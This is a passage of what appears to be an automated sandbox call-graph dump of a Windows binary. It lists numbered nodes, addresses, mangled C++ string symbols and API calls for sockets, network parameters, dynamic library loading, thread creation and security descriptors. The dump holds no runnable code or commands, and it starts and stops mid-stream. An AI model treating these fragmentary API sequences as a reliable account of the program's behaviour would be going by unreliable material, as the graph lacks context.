38340->38337 38341->38283 38342->38288 38442 1000ef20 WSASocketA 38443 1000ef63 WSAIoctl 38442->38443 38444 1000ef4b 38442->38444 38443->38444 38450 1000ef8b 38443->38450 38445 10025980 2 API calls 38444->38445 38446 1000ef5c 38445->38446 38447 1000f004 38448 10025980 2 API calls 38447->38448 38449 1000f017 38448->38449 38450->38447 38451 1000efe7 38450->38451 38452 1000efc8 38450->38452 38451->38447 38454 1000efeb 38451->38454 38453 10025980 2 API calls 38452->38453 38456 1000efe0 38453->38456 38455 10025980 2 API calls 38454->38455 38457 1000effd 38455->38457 38458 41b760 38459 41b7a3 38458->38459 38460 41b7da ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38459->38460 38461 41b7ef 38460->38461 38462 41b849 38461->38462 38464 41b861 38461->38464 38463 41b8b6 ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 38462->38463 38466 418004 38463->38466 38465 41b886 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38464->38465 38477 41b89f 38465->38477 38467 41b8c8 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEABDI 38466->38467 38468 41b8db 38467->38468 38469 41b8e3 ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 38468->38469 38470 41b927 38468->38470 38472 418004 38469->38472 38471 41b948 ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 38470->38471 38476 41ba80 38470->38476 38474 418004 38471->38474 38475 41b8f5 ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEABDI 38472->38475 38473 41baa6 ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 38478 418004 38473->38478 38479 41b961 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 38474->38479 38480 41b908 38475->38480 38476->38473 38524 41bb57 38476->38524 38481 41babf ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 38478->38481 38482 418004 38479->38482 38480->38470 38487 41b910 ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 38480->38487 38484 418004 38481->38484 38485 41b974 ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 38482->38485 38483 41bb7b ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 38486 418004 38483->38486 38489 41bad2 ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 38484->38489 38490 418004 38485->38490 38491 41bb8d ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 38486->38491 38487->38470 38488 41bc24 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 38495 418004 38488->38495 38493 418004 38489->38493 38494 41b987 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 38490->38494 38496 41bba0 38491->38496 38492 41bbc1 ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 38497 418004 38492->38497 38499 41bae5 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 38493->38499 38500 418004 38494->38500 38501 41bc40 ?rend@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$reverse_iterator@Vconst_iterator@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2 38495->38501 38496->38492 38502 41bbe6 38496->38502 38498 41bbd3 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 38497->38498 38498->38502 38503 418004 38499->38503 38504 41b99a ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 38500->38504 38505 418004 38501->38505 38502->38488 38506 41baf8 ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 38503->38506 38507 418004 38504->38507 38508 41bc66 ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AVconst_iterator@12 38505->38508 38509 418004 38506->38509 38510 41b9b7 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 38507->38510 38511 418004 38508->38511 38512 41bb15 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 38509->38512 38513 418004 38510->38513 38514 41bc85 ?rend@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV?$reverse_iterator@Vconst_iterator@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@2 38511->38514 38515 418004 38512->38515 38516 41b9cd ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 38513->38516 38517 41bca4 38514->38517 38518 41bb2b ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 38515->38518 38519 418004 38516->38519 38523 41bcb3 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 38517->38523 38521 418004 38518->38521 38520 41b9e3 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 38519->38520 38526 41b9f9 38520->38526 38522 41bb41 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 38521->38522 38522->38524 38525 41bcd2 38523->38525 38524->38483 38524->38496 38527 41bcdc ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 38525->38527 38529 41bcf8 38525->38529 38526->38476 38528 41ba2a ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 38526->38528 38527->38529 38530 418004 38528->38530 38531 41bd33 ?empty@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 38529->38531 38532 41bd7a 38529->38532 38533 41ba46 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 38530->38533 38534 41bd48 38531->38534 38536 41be5a ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 38532->38536 38553 41bda6 38532->38553 38537 41ba5c 38533->38537 38534->38532 38538 41bd4f ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 38534->38538 38535 41bffa ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 38539 418004 38535->38539 38540 41be7b 38536->38540 38544 41ba67 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38537->38544 38541 418004 38538->38541 38542 41c00e ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 38539->38542 38545 41bea5 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 38540->38545 38543 41bd64 ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@ 38541->38543 38549 41c023 38542->38549 38543->38532 38544->38476 38546 41becd 38545->38546 38547 41beda ?size@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 38546->38547 38548 41befe 38547->38548 38550 41c0aa ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38549->38550 38551 41c0c3 38550->38551 38555 41c0d2 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38551->38555 38553->38535 38553->38549 38555->38477 38559 422b60 38562 10053eb0 4 API calls 38559->38562 38564 10016f63 38559->38564 38568 1001a726 38559->38568 38560 422b8b 38562->38560 38565 10016f6b 38564->38565 38566 10016f81 38565->38566 38567 10016f7a ??3@YAXPAX 38565->38567 38566->38560 38567->38566 38569 1001a73a RtlEnterCriticalSection 38568->38569 38570 1001a86d 38568->38570 38571 1001a750 RtlLeaveCriticalSection 38569->38571 38572 1001a75b RtlLeaveCriticalSection 38569->38572 38570->38560 38571->38570 38573 1001a76f Mailbox 38572->38573 38573->38570 38574 1001a867 CoUninitialize 38573->38574 38574->38570 38575 1002c120 38576 1002c143 38575->38576 38579 1002be90 MultiByteToWideChar 38576->38579 38580 1002bf33 38579->38580 38581 1002bec9 GetLastError 38579->38581 38582 1000f130 38581->38582 38583 1002bedb ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38582->38583 38584 100013d0 4 API calls 38583->38584 38585 1002bf0e 38584->38585 38586 1002bf23 _CxxThrowException 38585->38586 38586->38580 38587 1003cca0 RtlEnterCriticalSection 38589 1003cced 38587->38589 38588 1003cd61 RtlLeaveCriticalSection 38589->38588 38590 1003cd29 38589->38590 38592 1003cb10 38589->38592 38590->38588 38593 1003cb30 38592->38593 38594 1003cbd4 WSAEnumNetworkEvents 38593->38594 38595 1003cbea WSAGetLastError 38594->38595 38597 1003cc14 38594->38597 38596 1003cc01 38595->38596 38596->38590 38597->38590 38598 100582a0 38622 1005cf10 38598->38622 38600 10058498 38602 100584af GetTickCount 38600->38602 38603 100585d9 38600->38603 38601 100582fe 38601->38600 38604 10058348 GetTickCount 38601->38604 38606 100258ac 3 API calls 38602->38606 38605 10009f50 Mailbox 2 API calls 38603->38605 38607 10057620 38604->38607 38608 100585ed 38605->38608 38615 100584e7 38606->38615 38609 10058387 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 38607->38609 38610 10025980 2 API calls 38608->38610 38611 10053b90 6 API calls 38609->38611 38612 1005860d 38610->38612 38614 100583b6 38611->38614 38619 100583e2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 38614->38619 38621 1005840f 38614->38621 38636 1005c260 CreateThread 38615->38636 38616 1005851b 38618 1005853d ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ 38616->38618 38617 10058473 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38617->38600 38620 10058571 38618->38620 38619->38621 38620->38603 38621->38617 38637 10025ed0 38622->38637 38624 1005cf2f GetNetworkParams 38625 1005cf6c 38624->38625 38632 1005cf8b 38624->38632 38629 1005cf76 GetNetworkParams 38625->38629 38626 1005d008 38628 10025980 2 API calls 38626->38628 38627 1005cff0 38627->38626 38633 1005cfff ??_V@YAXPAX 38627->38633 38631 1005d025 38628->38631 38629->38632 38630 1005cfa2 inet_addr 38630->38632 38631->38601 38632->38626 38632->38627 38632->38630 38634 1005cfb1 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38632->38634 38635 1005cfd5 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38632->38635 38633->38626 38634->38632 38635->38632 38636->38616 38639 1005c250 9 API calls 38636->38639 38638 10025ed7 38637->38638 38638->38624 38638->38638 38640 1006f0a0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI 38641 100013d0 4 API calls 38640->38641 38642 1006f189 38641->38642 38667 1006eae0 16 API calls 38642->38667 38668 10027330 38642->38668 38643 1006f1ab ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38646 1006f1f4 38643->38646 38665 1006f280 38643->38665 38644 10025980 2 API calls 38645 1006f520 38644->38645 38647 1006f217 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI 38646->38647 38648 1006f27c 38647->38648 38649 1006f2b5 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 38648->38649 38648->38665 38650 1006f2e7 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI ??$?8DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 38649->38650 38651 1006f323 38649->38651 38650->38651 38652 1006f338 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38651->38652 38653 1006f349 38651->38653 38652->38653 38654 1006f366 38653->38654 38655 1006f359 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38653->38655 38656 100258ac 3 API calls 38654->38656 38654->38665 38655->38654 38657 1006f3ad 38656->38657 38658 1006f3c4 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI 38657->38658 38659 1006f456 38657->38659 38658->38659 38660 1006f480 38659->38660 38661 1006f46c ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38659->38661 38662 1006f490 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38660->38662 38663 1006f4a1 38660->38663 38661->38660 38662->38663 38664 1006f4b1 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38663->38664 38663->38665 38664->38665 38665->38644 38667->38643 38669 10027351 FindFirstFileA 38668->38669 38671 10027380 FindClose 38669->38671 38672 10027369 38669->38672 38673 10025980 2 API calls 38671->38673 38674 10025980 2 API calls 38672->38674 38676 10027397 38673->38676 38675 10027379 38674->38675 38675->38643 38676->38643 38677 100b2320 38678 100258ac 3 API calls 38677->38678 38679 100b2358 38678->38679 38680 100b238e ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38679->38680 38711 10071870 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38680->38711 38682 100b23c7 38714 10071940 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38682->38714 38684 100b23d9 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38717 100717a0 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38684->38717 38686 100b2412 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38720 100e9b40 gethostname 38686->38720 38688 100b2448 38689 100b2459 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38688->38689 38690 100b248a 38689->38690 38691 100298f0 16 API calls 38690->38691 38692 100b2510 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38691->38692 38694 100b2543 38692->38694 38693 100298f0 16 API calls 38695 100b25c0 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38693->38695 38694->38693 38696 100b25f3 38695->38696 38736 10089da0 RtlEnterCriticalSection 38696->38736 38712 100718c6 38711->38712 38713 100718f0 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38712->38713 38713->38682 38715 1006d7fe 5 API calls 38714->38715 38716 100719be ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38715->38716 38716->38684 38718 1006d7fe 5 API calls 38717->38718 38719 1007181e ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38718->38719 38719->38686 38721 100e9bab gethostbyname 38720->38721 38722 100e9b91 WSAGetLastError ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38720->38722 38724 100e9bbd WSAGetLastError ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38721->38724 38725 100e9bd7 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38721->38725 38723 100e9cbd 38722->38723 38728 10025980 2 API calls 38723->38728 38724->38723 38726 100e9bfd 38725->38726 38727 100e9c94 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38725->38727 38729 100e9c10 inet_ntoa ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 38726->38729 38731 100e9c32 inet_addr 38726->38731 38732 100e9c90 38726->38732 38733 100e9c50 ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 38726->38733 38727->38723 38730 100e9cdd 38728->38730 38729->38726 38729->38731 38730->38688 38731->38726 38732->38727 38733->38726 38734 100e9c67 ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDII 38733->38734 38734->38726 38735 100e9ce4 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38734->38735 38735->38723 38737 10027700 38736->38737 38739 42ea72 38741 42ea92 38739->38741 38743 42eaf3 38739->38743 38740 42eb0b ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@PB_W 38742 42eb20 38740->38742 38741->38743 38744 42eac0 swprintf 38741->38744 38743->38740 38744->38740 38745 422af0 38748 10005460 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDI ?find_first_not_of@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIPBDI 38745->38748 38746 422b27 38749 100054a4 38748->38749 38750 1000549f 38748->38750 38759 10011246 ?assign@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ 38749->38759 38751 100054df ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38750->38751 38752 10025980 2 API calls 38751->38752 38753 100054f6 38752->38753 38753->38746 38755 100054ba init 38756 100054c7 38755->38756 38757 100054cb set_partner_id 38755->38757 38758 100054d6 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE 38756->38758 38757->38758 38758->38751 38759->38755 38760 437770 38761 4377b4 38760->38761 38762 4377e5 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 38761->38762 38763 418004 38762->38763 38764 437801 ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 38763->38764 38765 437813 38764->38765 38766 437820 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 38765->38766 38767 43784b 38765->38767 38771 437840 38766->38771 38768 437885 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 38767->38768 38769 418004 38768->38769 38770 4378a1 ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 38769->38770 38772 4378b3 38770->38772 38773 437901 ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 38772->38773 38774 4378c0 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 38772->38774 38776 418004 38773->38776 38775 418004 38774->38775 38777 4378dd ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 38775->38777 38778 437913 LoadLibraryW 38776->38778 38777->38771 38779 437923 38778->38779 38780 437a03 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 38779->38780 38781 437930 GetProcAddress 38779->38781 38782 418004 38780->38782 38783 418004 38781->38783 38784 437a20 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 38782->38784 38785 437948 GetProcAddress 38783->38785 38786 4379fb 38784->38786 38787 418004 38785->38787 38786->38771 38788 437965 GetProcAddress 38787->38788 38789 418004 38788->38789 38790 437983 GetProcAddress 38789->38790 38791 418004 38790->38791 38792 4379a1 GetProcAddress 38791->38792 38793 418004 38792->38793 38794 4379bf ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 38793->38794 38795 418004 38794->38795 38796 4379e2 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 38795->38796 38796->38786 38797 100357b0 38798 100357d5 38797->38798 38799 10001213 RtlInitializeCriticalSection 38798->38799 38800 10035801 38799->38800 38801 1003580b 38800->38801 38807 100011e7 _CxxThrowException 38800->38807 38806 1004c3e0 RtlInitializeCriticalSection 38801->38806 38804 1003582c 38805 1003593d RtlInitializeCriticalSection GetSystemInfo 38804->38805 38806->38804 38808 4369f0 lstrcpyW 38809 418004 38808->38809 38810 436a57 PathFileExistsW 38809->38810 38811 436a6a 38810->38811 38812 436ace ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 38811->38812 38813 436a6e GetModuleFileNameW 38811->38813 38814 418004 38812->38814 38820 436a8b 38813->38820 38815 436ae3 PathFileExistsW 38814->38815 38817 436b00 38815->38817 38816 436b71 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 38822 436b69 38816->38822 38817->38816 38818 436b1e ??$?8_WU?$char_traits@_W@std@@V?$allocator@_W@1@@std@@YA_NABV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@0@PB_W 38817->38818 38819 436b3c 38818->38819 38819->38816 38821 436b43 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 38819->38821 38820->38812 38821->38822 38823 10051530 38824 10051564 38823->38824 38825 1005165b WSARecvFrom 38824->38825 38826 10051666 WSAGetLastError 38825->38826 38827 100516b2 38825->38827 38826->38827 38828 10051676 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38826->38828 38829 1021adf0 38828->38829 38830 100516a3 _CxxThrowException 38829->38830 38830->38827 38843 432680 ??0?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE@ABV01@ 38844 4326c9 38843->38844 38845 4326d9 ??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W 38844->38845 38846 4326f3 38845->38846 38847 432716 ?data@?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@ 38846->38847 38848 4326ff ??Y?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAEAAV01@PB_W 38846->38848 38850 418004 38847->38850 38849 418004 38848->38849 38849->38847 38851 432728 CreateEventW 38850->38851 38853 43273e 38851->38853 38852 432753 ??1?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@QAE 38854 432775 38852->38854 38853->38852 38855 100312c0 38856 100312e5 38855->38856 38859 10035a50 38856->38859 38862 10046e00 38859->38862 38860 1003131d 38863 10046e37 38862->38863 38872 10046e65 38862->38872 38864 10046f20 38863->38864 38865 10046e3e 38863->38865 38866 10046ebe 38863->38866 38869 10046e6a 38863->38869 38863->38872 38898 10045780 17 API calls 38864->38898 38865->38869 38870 10046e5c 38865->38870 38897 10045530 6 API calls 38866->38897 38869->38872 38873 10046f02 AtlComPtrAssign 38869->38873 38874 10045160 38870->38874 38872->38860 38873->38872 38875 1004522e 38874->38875 38888 10045196 38874->38888 38899 10044e30 LoadLibraryA 38875->38899 38877 1004528d 38878 10045291 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38877->38878 38879 100452c2 38877->38879 38881 1002bd70 38878->38881 38906 10044ef0 38879->38906 38882 100452b1 _CxxThrowException 38881->38882 38882->38879 38883 100452cd 38884 100452d1 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38883->38884 38890 10045306 38883->38890 38885 1002bd70 38884->38885 38886 100452f5 _CxxThrowException 38885->38886 38886->38890 38887 1004543b ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38891 1002bd70 38887->38891 38889 10045223 AtlComPtrAssign 38888->38889 38889->38875 38890->38887 38895 100454a2 38890->38895 38896 10045419 ??0exception@@QAE@ABQBD _CxxThrowException 38890->38896 38892 1004545f _CxxThrowException ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38891->38892 38893 1002bd70 38892->38893 38894 10045491 _CxxThrowException 38893->38894 38894->38895 38895->38872 38896->38887 38897->38869 38898->38869 38900 10044eac GetLastError 38899->38900 38901 10044e6c GetProcAddress 38899->38901 38904 10044e8a 38900->38904 38902 10044e9f 38901->38902 38903 10044e7f GetLastError 38901->38903 38902->38900 38905 10044eb9 38902->38905 38903->38904 38904->38877 38905->38877 38907 10044f59 38906->38907 38908 10044f7d 38907->38908 38909 10044f5d GetLastError 38907->38909 38908->38883 38909->38883 38910 430700 ConvertStringSecurityDescriptorToSecurityDescriptorW 38911 430761 38910->38911 38912 430765 GetSecurityDescriptorSacl 38911->38912 38916 4307cb 38911->38916 38913 430784 38912->38913 38914 4307b8 LocalFree 38913->38914 38915 430788 SetSecurityInfo 38913->38915 38914->38916 38917 4307a9 38915->38917 38917->38914 38918 10049440 38923 10049190 38918->38923 38920 10049448 38921 1004944f ??3@YAXPAX 38920->38921 38922 10049458 38920->38922 38921->38922 38926 100487a0 38923->38926 38925 100491c0 38925->38920 38927 100487d4 38926->38927 38928 100487ab 38926->38928 38929 100487eb 38927->38929 38930 100487db ??3@YAXPAX 38927->38930 38933 100487b7 shutdown closesocket 38928->38933 38931 10048802 38929->38931 38932 100487f2 ??3@YAXPAX 38929->38932 38930->38929 38931->38925 38932->38931 38933->38927 38934 100ad1ce 38937 100a7a70 38934->38937 39099 100d1419 38937->39099 38939 100a7ab2 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38940 100a7b18 ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 38939->38940 38948 100a7ae1 38939->38948 38941 100a7b59 ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 38940->38941 38942 100a7ccd ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38940->38942 38943 100a7ba3 38941->38943 38944 100a7b86 ??$?9DU?$char_traits@D@std@@V?$allocator@D@1@@std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD 38941->38944 38945 100013d0 4 API calls 38942->38945 38949 100a7bb1 ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD 38943->38949 38944->38943 38946 100a7c45 ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@ABV12@ 38944->38946 38947 100a7cfe 38945->38947 38955 100a7c6e 38946->38955 38952 100a7d26 ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBD 38947->38952 